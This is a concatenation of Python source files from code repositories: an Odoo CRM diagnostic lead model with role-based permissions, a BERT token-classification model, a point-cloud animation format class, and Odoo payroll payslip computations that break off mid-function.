unbound and raised NameError)\n suggestion = False\n area = False\n if field_name in SUGGEST_VALUATION:\n suggestion = SUGGEST_VALUATION[field_name].get(score, False)\n area = SUGGEST_VALUATION[field_name].get('area', False)\n return suggestion, area\n\n @api.model\n def action_to_return_to_crm_diagnostic(self, crm_diagnostic_id):\n search_view = self.env.ref('crm_diagnostic.crm_diagnostic_view')\n return {\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'crm.diagnostic',\n 'res_id': crm_diagnostic_id.id,\n 'views': [(search_view.id, 'form')],\n 'view_id': search_view.id,\n 'target': 'current',\n 'flags': {'mode': 'readonly', 'action_buttons': True},\n }\n\n##########################################################################\n# ROLE METHODS\n##########################################################################\n\n # set the current user\n @api.depends('current_user')\n def get_current_user(self):\n for lead in self:\n lead.current_user = self.env.user.id\n\n # check if the current user is facilitator\n @api.depends('current_user')\n def current_user_is_facilitator(self):\n for lead in self:\n if lead.is_facilitator():\n lead.current_user_facilitator = True\n else:\n lead.current_user_facilitator = False\n\n # check if the current user is mentor\n @api.depends('current_user')\n def current_user_is_mentor(self):\n for lead in self:\n if lead.is_mentor():\n lead.current_user_mentor = True\n else:\n lead.current_user_mentor = False\n\n @api.depends('current_user')\n def current_user_is_admin(self):\n for lead in self:\n if lead.is_admin():\n lead.current_user_admin = True\n else:\n lead.current_user_admin = False\n\n @api.depends('user_id')\n def get_facilitator_role(self):\n for lead in self:\n facilitator_roles = lead.user_id.role_ids\n if facilitator_roles:\n facilitator_role = facilitator_roles[0].name\n\n if facilitator_role:\n lead.facilitator_role = facilitator_role\n else:\n lead.facilitator_role = ''\n else:\n lead.facilitator_role = ''\n\n @api.depends()\n def compute_show_action_set_rainbowman(self):\n for lead in self:\n if lead.stage_id.allow_mark_as_won:\n lead.show_action_set_rainbowman = True\n else:\n lead.show_action_set_rainbowman = False\n\n # check if the current user is the admin user\n @api.depends('current_user')\n def current_user_is_root(self):\n for lead in self:\n try:\n root = self.env.ref('base.user_admin').id\n if root == lead.current_user.id or lead.is_cordinator() or lead.is_orientador():\n lead.root_current_user = True\n else:\n lead.root_current_user = False\n except Exception as e:\n lead.root_current_user = False\n print(e)\n\n def write(self, values):\n if len(values) == 1 and 'stage_id' in values:\n if self.is_facilitator():\n raise ValidationError(\"No tienes permiso para cambiar de etapa directamente. 
{}\".format(values))\n return super(CrmLead, self).write(values)\n\n\n # return the field list to validate the module1\n def fields_module1(self):\n return [\n 'x_datos1', 'attach_file', \"x_nombre_negocio\", \"x_nombre\", \"doctype\",\n \"x_identification\", \"x_sexo\", \"x_edad1\", \"state_id\", \"xcity\", \"x_dir_res\",\n \"x_comuna\", \"x_vereda\", \"x_ubicacion_negocio\", \"mobile\", \"x_estrato\", \n \"x_pobl_esp1\", \"x_tipo_vivienda\", \"x_no_personas_viven_propietario\", \"x_etnia\", \"x_sisben\",\n \"x_afiliado1\", \"x_escolaridad\", \"x_ubic\", \"x_com_cuenta1\", \"x_tien_dur\", \"x_herramientas\", \"x_depend\"\n ]\n\n # return the field list to validate the module2\n def fields_module2(self):\n return ['x_cont1', 'first_module_ready']\n \n def fields_module3(self):\n return ['third_module_ready']\n\n # methos that return list of fields by section\n def fields_module3_generalities(self):\n return [\n 'x_datos3'\n ]\n\n # MÓDULO 3 INNOVACIÓN, OPERACIÓN Y ORGANIZACIÓN\n def fields_module3_inno_org_op(self):\n return [\n 'x_innova_org_1', 'x_innova_org_2', 'x_innova_org_3',\n 'x_innova_org_4', 'x_innova_org_5', 'x_innova_org_6',\n ]\n\n #MODULO 3 MODELO DE NEGOCIOS\n def fields_module3_business_model(self):\n return [\n 'x_neg4', 'x_neg6', 'x_neg7',\n 'x_neg8', 'x_neg14',\n ]\n\n #MODELO 3 FINANCIERO\n def fields_module3_financial(self):\n return [\n 'x_financiero18', 'x_financiero20', 'x_financiero21',\n 'x_financiero22', 'x_financiero23', 'x_financiero24',\n 'x_financiero25',\n ]\n\n #MODELO 3 MERCADEO\n def fields_module3_marketing(self):\n return [\n 'x_neg5', 'x_mer_com30', 'x_mer_com31',\n 'x_mer_com32', 'x_mer_com34', 'x_mer_com38',\n 'x_mer_com39',\n ]\n\n #MODELO 3 FORMALIZACION\n def fields_module3_formalization(self):\n return [\n 'x_forma44', 'x_forma45', 'x_forma46',\n 'x_forma47_1', 'x_forma49_1',\n ]\n\n def full_list_field(self):\n full_fields = []\n full_fields.extend(self.fields_module3_generalities())\n full_fields.extend(self.fields_module3_inno_org_op())\n full_fields.extend(self.fields_module3_business_model())\n full_fields.extend(self.fields_module3_financial())\n full_fields.extend(self.fields_module3_marketing())\n full_fields.extend(self.fields_module3_formalization())\n full_fields.extend(['second_module_read'])\n return full_fields\n # ended section\n\n # validating if the current user has the facilitador profile\n def is_facilitator(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'facilitador')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n # validating if the current user has the cordinator profile\n def is_cordinator(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'coordinador')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n # validating if the current user has the mentor profile\n def is_mentor(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'mentor')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n \n def is_orientador(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'orientador')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n def is_admin(self):\n role_id = 
self.env['res.users.role'].sudo().search([('role_type', '=', 'admin')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n def is_administrativo(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'administrativo')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n def is_estudiante(self):\n role_id = self.env['res.users.role'].sudo().search([('role_type', '=', 'estudiante')])\n for role in role_id:\n if any(user.id == self.env.user.id for user in role.line_ids.mapped('user_id')):\n return True\n return False\n\n # computed if the module1 is ok\n @api.depends(fields_module1)\n def compute_first_module(self):\n for lead in self:\n if lead.is_facilitator() or lead.is_admin():\n if lead.all_fields_module1_are_ok():\n lead.first_module_ready = True\n else:\n lead.first_module_ready = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.first_module_ready = True\n else:\n lead.first_module_ready = False\n\n # computed if the module2 is ok\n @api.depends(fields_module2)\n def compute_second_module(self):\n for lead in self:\n if (lead.is_facilitator() or lead.is_admin()) and lead.first_module_ready:\n if lead.all_fields_module2_are_ok():\n lead.second_module_read = True\n else:\n lead.second_module_read = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.second_module_read = True\n else:\n lead.second_module_read = False\n\n # computed if the module3 is ok\n @api.depends(full_list_field)\n def compute_third_module(self):\n for lead in self:\n if (lead.is_facilitator() or lead.is_admin()) and lead.second_module_read:\n if lead.all_fields_module3_are_ok():\n lead.third_module_ready = True\n else:\n lead.third_module_ready = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.third_module_ready = True\n else:\n lead.third_module_ready = False\n\n @api.depends(\"stage_id\")\n def compute_four_module(self):\n for lead in self:\n if (lead.is_facilitator() or lead.is_admin()) and lead.third_module_ready:\n if lead.stage_id.stage_state == \"cuarto_encuentro\":\n lead.four_module_read = True\n else:\n lead.four_module_read = False\n elif lead.is_cordinator() or lead.is_orientador() or lead.is_mentor() or lead.is_admin():\n lead.four_module_read = True\n else:\n lead.four_module_read = False\n\n # validating it all fields of module3 were filled\n def all_fields_module3_are_ok(self):\n result = []\n result.append(self.check_inno_org_op(self.fields_module3_inno_org_op()))\n result.append(self.check_business_model_fields(self.fields_module3_business_model()))\n result.append(self.check_financial_fields(self.fields_module3_financial()))\n result.append(self.check_marketing_fields(self.fields_module3_marketing()))\n result.append(self.check_formalization_fields(self.fields_module3_formalization()))\n if any(r == False for r in result):\n return False\n else:\n return True\n\n # checking if all generalities field section are ok\n def check_generalities_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # cheking if all innovation fields section are ok\n def check_inno_org_op(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n 
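# --- added note (sketch, not part of the original module) ---\n # The check_*_fields helpers in this class all repeat the same test:\n # \"is every field in the list truthy on this lead?\". A single generic\n # helper could back them all, e.g.:\n #     def _all_fields_set(self, fields):\n #         return all(getattr(self, f, False) for f in fields)\n # and each check_* method would then simply return self._all_fields_set(fields).\n # --- end added note ---\n 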
# checking if all business model field section are ok\n def check_business_model_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all financial field section are ok\n def check_financial_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all marketing field section are ok\n def check_marketing_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # checking if all formalization field section are ok\n def check_formalization_fields(self, fields):\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # validating if all fields of module1 were filled\n def all_fields_module1_are_ok(self):\n fields = self.fields_module1()\n if any(not getattr(self, field) for field in fields):\n return False\n else:\n return True\n\n # validating if all fields of module2 were filled\n def all_fields_module2_are_ok(self):\n if getattr(self, 'x_cont1') and getattr(self, 'x_cont1') == 'si':\n return True\n elif (getattr(self, 'x_cont1') and getattr(self, 'x_cont1') == 'no') and getattr(self, 'x_cont1_por'):\n return False\n else:\n return False\n\n # getting the stage by stage state\n @api.model\n def get_stage(self, stage_state):\n stage_id = self.env['crm.stage'].sudo().search([('stage_state', '=', stage_state)], limit=1)\n return stage_id\n\n # change the stage on the lead according to the question modules\n @api.onchange('first_module_ready', 'second_module_read', 'third_module_ready')\n def update_stage(self):\n if (self.is_facilitator() or self.is_cordinator()):\n if self.first_module_ready:\n second_stage = self.get_stage('segundo_encuentro')\n self.with_user(SUPERUSER_ID).stage_id = second_stage if second_stage else self.stage_id\n if self.first_module_ready and self.second_module_read:\n third_stage = self.get_stage('tercer_encuentro')\n self.with_user(SUPERUSER_ID).stage_id = third_stage if third_stage else self.stage_id\n if self.first_module_ready and self.second_module_read and self.third_module_ready:\n fourth_stage = self.get_stage('espera_de_plan')\n self.with_user(SUPERUSER_ID).stage_id = fourth_stage if fourth_stage else self.stage_id\n\n # inherited method to validate if the current user has the cordinator profile\n # if so then we set readonly=False on the mentors field\n @api.model\n def fields_view_get(\n self, view_id=None, view_type='form', toolbar=False,\n submenu=False):\n res = super(CrmLead, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n if view_type == 'form':\n doc = etree.XML(res['arch'])\n if self.is_cordinator():\n for node in doc.xpath(\"//field[@name='mentors']\"):\n if 'modifiers' in node.attrib:\n modifiers = json.loads(node.attrib['modifiers'])\n modifiers['readonly'] = False\n node.attrib['modifiers'] = json.dumps(modifiers)\n if 'options' in node.attrib:\n options = json.loads(node.attrib['options'])\n options['no_create'] = True\n options['no_open'] = True\n node.attrib['options'] = json.dumps(options)\n\n #res['arch'] = etree.tostring(doc)\n if self.is_facilitator():\n for node in doc.xpath(\"//header/field[@name='stage_id']\"):\n if 'options' in node.attrib:\n node.attrib.pop('options')\n\n #res['arch'] = etree.tostring(doc)\n\n for node in doc.xpath(\"//field[@name='mentors']\"):\n # only rewrite options when the attribute is present\n # (the original \"if not 'options' in node.attrib\" guard was inverted and raised KeyError)\n if 'options' in node.attrib:\n options = json.loads(node.attrib['options'])\n options['no_create'] = False\n options['no_open'] = False\n node.attrib['options'] = json.dumps(options)\n\n if not self.is_mentor():\n if not self.is_admin():\n if not self.is_facilitator():\n for node in doc.xpath(\"//header/button[@name='action_set_won_rainbowman']\"):\n if 'modifiers' in node.attrib:\n modifiers = json.loads(node.attrib['modifiers'])\n modifiers['invisible'] = True\n node.attrib['modifiers'] = json.dumps(modifiers)\n\n # res['arch'] = etree.tostring(doc)\n\n if not self.is_mentor():\n if not self.is_admin():\n if not self.is_facilitator():\n for node in doc.xpath(\"//header/field[@name='stage_id']\"):\n if 'modifiers' in node.attrib:\n modifiers = json.loads(node.attrib['modifiers'])\n modifiers['readonly'] = True\n node.attrib['modifiers'] = json.dumps(modifiers)\n\n res['arch'] = etree.tostring(doc)\n return res\n\n @api.onchange('x_nombre_negocio')\n def _onchange_x_nombre_negocio(self):\n if self.x_nombre_negocio:\n self.x_nombre_negocio = str(self.x_nombre_negocio).upper()\n\n @api.onchange('name')\n def _onchange_name(self):\n chars = ['!', '\"', '#', '$', '%', '&', \"'\", '(', ')', '*', '+', ',', '-', '.', '/', '\\\\', ':', ';', '<', '=', '>', '?', '@', '[', ']', '^', '_', '`', '{', '|', '}', '~']\n delimiter = ''\n for char in chars:\n if char in str(self.name) :\n raise ValidationError(('No se permiten caracteres especiales en el Nombre del Propietario: {}'.format(delimiter.join(chars))))\n\n @api.onchange('x_nombre')\n def _onchange_x_nombre(self):\n chars = ['!', '\"', '#', '$', '%', '&', \"'\", '(', ')', '*', '+', ',', '-', '.', '/', '\\\\', ':', ';', '<', '=', '>', '?', '@', '[', ']', '^', '_', '`', '{', '|', '}', '~']\n delimiter = ''\n for char in chars:\n if char in str(self.x_nombre) :\n raise ValidationError(('No se permiten caracteres especiales en el Nombre del Propietario: {}'.format(delimiter.join(chars))))\n##########################################################################\n# ATTENTION PLAN METHODS\n##########################################################################\n crm_attenation_plan_ids = fields.One2many(\n 'crm.attention.plan',\n 'lead_id',\n copy=False)\n\n # returning an action to go to the crm.attention.plan form view related to the lead\n def call_action_crm_attention_plan(self):\n for record in self:\n # validating if it is necessary to create a new attention plan record or return the first on the list\n if len(record.crm_attenation_plan_ids) > 0:\n return record.action_to_return_to_crm_attention_plan(record.crm_attenation_plan_ids[0])\n else:\n if len(record.crm_lead_id) <= 0:\n # avoid running the attention plan before the diagnostic has been executed\n raise ValidationError('No puede realizar el plan de atención sin antes haber realizado el diagnostico.')\n attention_plan_vals = record.getting_values_to_crm_attention_plan()\n crm_attention_id = self.env['crm.attention.plan'].create(attention_plan_vals)\n #record.plan_line_ids = attention_plan_vals['plan_line_ids']\n crm_attention_id.diagnostico = record.diagnostico\n record.plan_line_ids = attention_plan_vals['plan_line_ids']\n return record.action_to_return_to_crm_attention_plan(crm_attention_id)\n\n # return a dict of values for crm.attention.plan\n def getting_values_to_crm_attention_plan(self):\n for lead in self:\n dic_vals = {\n 'lead_id': lead.id,\n 
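# (added note) the remaining keys are filled in below from the lead record;\n # 'plan_line_ids' is pre-seeded by get_attention_plan_lines() with one empty\n # row per priority bucket ('48 H', '1 Semana', ..., 'Hábitos a desarrollar')\n 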
'nombre_negocio': lead.x_nombre_negocio,\n 'ubicacion': lead.x_dir_neg,\n 'fecha': fields.Date.today(),\n 'plan_line_ids': lead.get_attention_plan_lines()\n }\n return dic_vals\n\n def get_attention_plan_lines(self):\n lines = []\n items = ['48 H', '1 Semana', '2 Semanas', '1 Mes', 'A futuro', 'Hábitos a desarrollar']\n for item in items:\n lines.append(\n (0, 0, {\n 'prioridad': item,\n 'actividades': False,\n 'soluciones': False,\n 'reponsable': False,\n }))\n return lines\n\n @api.model\n def action_to_return_to_crm_attention_plan(self, crm_attention_id):\n form_view = self.env.ref('crm_diagnostic.q_crm_attention_plan_form_view')\n return {\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'crm.attention.plan',\n 'res_id': crm_attention_id.id,\n 'views': [(form_view.id, 'form')],\n 'view_id': form_view.id,\n 'target': 'current',\n }\n","repo_name":"ernesto-medina/diagnostico_odoo","sub_path":"crm_diagnostic/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":51679,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"740986668","text":"from transformers import BertModel,BertPreTrainedModel\nimport torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss, KLDivLoss\n\nclass BERTForTokenClassification_v2(BertPreTrainedModel):\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n\n self.embedding = nn.Linear(20, config.hidden_size)\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, config.num_labels)\n\n self.init_weights()\n\n \n def forward(self, field_embeds,input_ids=None, attention_mask=None, token_type_ids=None,\n position_ids=None, head_mask=None, inputs_embeds=None, labels=None, label_mask=None):\n\n bert_embedding = self.get_input_embeddings() \n # embedding object \n # see more: https://pytorch.org/docs/stable/generated/torch.nn.Embedding.html\n\n embeds_1 = bert_embedding(input_ids) \n embeds_2 = self.embedding(field_embeds)\n inputs_embeds = torch.add(embeds_1,embeds_2)\n\n outputs = self.bert(input_ids=None,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds)\n\n sequence_output = outputs[0]\n\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n\n outputs = (logits,sequence_output) + outputs[2:] # add hidden states and attention if they are here\n loss_dict = {}\n if labels is not None:\n # logits = self.logsoftmax(logits)\n # Only keep active parts of the loss\n active_loss = True\n if attention_mask is not None:\n active_loss = attention_mask.view(-1) == 1\n # active_loss = True\n # if attention_mask is not None:\n # active_loss = attention_mask.view(-1) == 1\n # if label_mask is not None:\n # active_loss = active_loss & label_mask.view(-1)\n # active_logits = logits.view(-1, self.num_labels)[active_loss]\n \n for key in labels:\n label = labels[key]\n if label is None:\n continue\n # if key==\"pseudo\" and label_mask is not None:\n if label_mask is not None:\n all_active_loss = active_loss & label_mask.view(-1)\n else:\n all_active_loss = active_loss\n active_logits = logits.view(-1, self.num_labels)[all_active_loss]\n\n if label.shape == logits.shape:\n loss_fct = KLDivLoss()\n # loss_fct = SoftFocalLoss(gamma=2)\n if attention_mask is not None or label_mask is not None:\n active_labels 
= label.view(-1, self.num_labels)[all_active_loss]\n loss = loss_fct(active_logits, active_labels)\n else:\n loss = loss_fct(logits, label)\n else:\n loss_fct = CrossEntropyLoss()\n # loss_fct = FocalLoss(gamma=2)\n # loss_fct = NLLLoss()\n if attention_mask is not None or label_mask is not None:\n active_labels = label.view(-1)[all_active_loss]\n loss = loss_fct(active_logits, active_labels)\n else:\n loss = loss_fct(logits.view(-1, self.num_labels), label.view(-1))\n loss_dict[key] = loss\n\n\n outputs = (loss_dict,) + outputs\n return outputs # (loss), scores, (hidden_states), (attentions)\n","repo_name":"THU-KEG/MOOC-NER","sub_path":"DS-MOCE/Self-train/models/modeling_bert.py","file_name":"modeling_bert.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"72308921844","text":"import numpy as np\nfrom ..utilities import load_json_file, write_to_json_file\n\n\nclass Panim(object):\n \"\"\" A customized animation data format for point cloud data. It is also used in Unity.\n \"\"\"\n\n def __init__(self):\n self.motion_data = None\n self.has_skeleton = False\n self.skeleton = None\n \n def load(self, filename):\n \"\"\"\n \n Arguments:\n filename {str} -- path to .panim file\n \"\"\"\n json_data = load_json_file(filename)\n self.motion_data = json_data['motion_data']\n self.has_skeleton = json_data['has_skeleton']\n self.skeleton = json_data['skeleton']\n \n def save(self, saveFilename):\n \"\"\"\n \n Arguments:\n saveFilename {str} -- save path\n \"\"\"\n if self.has_skeleton:\n output_data = {'motion_data': self.motion_data.tolist(),\n 'has_skeleton': self.has_skeleton,\n 'skeleton': self.skeleton\n }\n else:\n output_data = {'motion_data': self.motion_data.tolist(),\n 'has_skeleton': self.has_skeleton\n }\n write_to_json_file(saveFilename, output_data)\n \n def setSkeleton(self, ske_description):\n \"\"\"list of joints\n \n Arguments:\n ske_description {list} -- a list of dictionary for joint information\n \"\"\"\n self.skeleton = ske_description\n self.has_skeleton = True\n\n def setMotionData(self, motion_data):\n \"\"\"\n \n Arguments:\n motion_data {numpy.array3d} -- n_frames * n_joints * 3\n \"\"\"\n self.motion_data = motion_data\n \n def scale_motion(self, scale_factor):\n if self.motion_data is not None:\n self.motion_data = np.asarray(self.motion_data) * scale_factor\n\n def convert_to_unity_format(self, scale=1.0):\n \"\"\" \n Convert motion_data from numpy array to dictionary for Unity loading. 
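Each frame becomes {'WorldPos': [{'x': ..., 'y': ..., 'z': ...}, ...]} with every coordinate scaled by 'scale'. 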
The coordinate system is flipped because Unity use left-hand coordinate system\n \"\"\"\n output_frames = []\n for frame in self.motion_data:\n world_pos = []\n for point in frame:\n world_pos.append({'x': -point[0] * scale,\n 'y': point[1] * scale,\n 'z': point[2] * scale})\n output_frame = {'WorldPos': world_pos}\n output_frames.append(output_frame)\n ## update motion_data\n self.motion_data = output_frames \n\n def get_joint_index(self, joint_name):\n for i in range(len(self.skeleton)):\n if self.skeleton[i]['name'] == joint_name:\n return self.skeleton[i]['index']\n return None\n\n def mirror(self, joint_mapping=None):\n \"\"\"[summary]\n \n Arguments:\n joint_mapping {[type]} -- [description]\n \"\"\"\n assert self.skeleton is not None\n motion_data = np.asarray(self.motion_data)\n mirrored_data = np.zeros(motion_data.shape)\n if joint_mapping is None: \n for i in range(len(self.skeleton)):\n if 'Left' in self.skeleton[i]['name']:\n mirrored_joint_name = self.skeleton[i]['name'].replace(\"Left\", \"Right\")\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0]\n elif 'Right' in self.skeleton[i]['name']:\n mirrored_joint_name = self.skeleton[i]['name'].replace(\"Right\", \"Left\")\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0]\n ### handle special \n elif self.skeleton[i]['name'] == \"RThumb\":\n mirrored_joint_name = \"LThumb\"\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0] \n elif self.skeleton[i]['name'] == \"LThumb\":\n mirrored_joint_name = \"RThumb\"\n mirrored_joint_index = self.get_joint_index(mirrored_joint_name)\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, mirrored_joint_index, :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0] \n else:\n mirrored_data[:, self.skeleton[i]['index'], :] = motion_data[:, self.skeleton[i]['index'], :]\n mirrored_data[:, self.skeleton[i]['index'], 0] = - mirrored_data[:, self.skeleton[i]['index'], 0]\n else:\n pass\n return mirrored_data","repo_name":"dhhjx880713/mosi_utils_anim","sub_path":"animation_data/panim.py","file_name":"panim.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36518538122","text":"import time\nfrom datetime import datetime, timedelta, date, time\nfrom pytz import timezone\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass Payslipline(models.Model):\n _inherit = 'hr.payslip.line'\n\n # @api.one\n def compute_remuneration(self):\n res = {}\n total = 0\n for slip_line in self:\n if slip_line.total >= 0:\n slip_line.remuneration = slip_line.total\n else:\n slip_line.remuneration = 0\n return total\n\n # @api.one\n def compute_deduction(self):\n total = 0\n for slip_line in self:\n if slip_line.total < 0:\n 
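# a negative line total is a deduction; store its magnitude (added note)\n 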
slip_line.deduction = abs(slip_line.total)\n else:\n slip_line.deduction = 0\n # self.deduction = total\n return total\n\n remuneration = fields.Float(compute=compute_remuneration, digits=(10, 2), string='Remuneration')\n deduction = fields.Float(compute=compute_deduction, digits=(10, 2), string='Deduction')\n\n\nclass Payslip(models.Model):\n _inherit = 'hr.payslip'\n\n user_id = fields.Many2one(\"res.users\", string=\"User\", default=lambda self: self.env.user)\n\n @api.onchange('struct_id')\n def _onchange_structure(self):\n structure = self.struct_id and self.struct_id.id or None\n input_records = self.env['hr.payslip.input.type'].search([])\n aa = input_records.mapped(lambda i: i.id)\n input_list = [x.id for x in input_records if\n (len(x.struct_ids) == 0 or structure and structure in x.struct_ids.mapped(lambda i: i.id))]\n self.input_line_ids = [(5, 0, 0)]\n for input_record in input_list:\n self.input_line_ids = [(0, 0, {'input_type_id': input_record, 'amount': 0.0})]\n\n # @api.model\n # def get_worked_day_lines(self, contracts, date_from, date_to):\n # \"\"\"\n # @param contract: Browse record of contracts\n # @return: returns a list of dict containing the input that should be applied for the given contract between date_from and date_to\n # \"\"\"\n # res = []\n # # fill only if the contract as a working schedule linked\n # for contract in contracts.filtered(lambda contract: contract.resource_calendar_id):\n # day_from = datetime.combine(fields.Date.from_string(date_from), time.min)\n # day_to = datetime.combine(fields.Date.from_string(date_to), time.max)\n #\n # # compute leave days\n # leaves = {}\n # calendar = contract.resource_calendar_id\n # tz = timezone(calendar.tz)\n # day_leave_intervals = contract.employee_id.list_leaves(day_from, day_to,\n # calendar=contract.resource_calendar_id)\n # for day, hours, leave in day_leave_intervals:\n # holiday = leave.holiday_id\n # current_leave_struct = leaves.setdefault(holiday.holiday_status_id, {\n # 'name': holiday.holiday_status_id.name or _('Global Leaves'),\n # 'sequence': 5,\n # 'code': holiday.holiday_status_id.name or 'GLOBAL',\n # 'number_of_days': 0.0,\n # 'number_of_hours': 0.0,\n # 'contract_id': contract.id,\n # })\n # current_leave_struct['number_of_hours'] += hours\n # work_hours = calendar.get_work_hours_count(\n # tz.localize(datetime.combine(day, time.min)),\n # tz.localize(datetime.combine(day, time.max)),\n # compute_leaves=False,\n # )\n # if work_hours:\n # current_leave_struct['number_of_days'] += hours / work_hours\n #\n # # compute worked days\n # work_data = contract.employee_id.get_work_days_data(day_from, day_to,\n # calendar=contract.resource_calendar_id)\n # employee_period = {\n # 'name': _(\"Normal Working Days paid at 100%\"),\n # 'sequence': 1,\n # 'code': 'WORK100',\n # 'number_of_days': work_data['days'],\n # 'number_of_hours': work_data['hours'],\n # 'contract_id': contract.id,\n # }\n #\n # res.append(employee_period)\n #\n # full_period = {\n # 'name': _(\"Full working days of the period\"),\n # 'sequence': 1,\n # 'code': 'PERIOD',\n # 'number_of_days': work_data['days'],\n # 'number_of_hours': work_data['hours'],\n # 'contract_id': contract.id,\n # }\n #\n # res.append(full_period)\n #\n # res.extend(leaves.values())\n # return res\n\n # @api.one\n def compute_remuneration(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'BAS':\n _sum = _sum + line.total\n res[slip.id] = _sum\n 
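# (added note) the assignment below is what actually fills the computed field;\n # the res dict is only built up as a convenience return value\n 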
slip.remuneration = _sum\n return res\n\n # @api.one\n def compute_overtimes(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'HEXTRA':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.overtimes = _sum\n return res\n\n # @api.one\n def compute_extra_remunerations(self):\n res = {}\n for slip in self:\n slip.extra_remunerations = slip.total_remunerations - slip.remuneration - slip.overtimes\n return res\n\n # @api.one\n def compute_misses(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'FALTA':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.misses = _sum\n return res\n\n # @api.one\n def compute_remuneration_inss_base(self):\n for slip in self:\n slip.remuneration_inss_base = slip.remuneration + slip.overtimes + slip.misses\n\n # @api.one\n def compute_remuneration_inss_extra(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code in ('ABOINSS', 'ABOINSSIRT'):\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.remuneration_inss_extra = _sum\n return res\n\n # @api.one\n def compute_remuneration_inss_total(self):\n for slip in self:\n slip.remuneration_inss_total = slip.remuneration_inss_base + slip.remuneration_inss_extra\n\n # @api.one\n def compute_amount_inss(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'INSS':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.amount_inss = _sum\n return res\n\n # @api.multi\n def compute_amount_irt(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n continue;\n if line.category_id.code == 'IRT':\n _sum = _sum + line.total\n res[slip.id] = _sum\n slip.amount_irt = _sum\n return res\n\n def compute_extra_deductions(self):\n for p in self:\n _sum = 0.0\n for line in p.line_ids:\n if line.category_id.code not in ('INSS', 'IRT') and line.deduction > 0:\n _sum = _sum + line.deduction\n p.extra_deductions = -_sum\n\n def compute_amount_base_irt(self):\n res = {}\n for slip in self:\n _sum = 0.0\n for line in slip.line_ids:\n if line.appears_on_payslip == False:\n 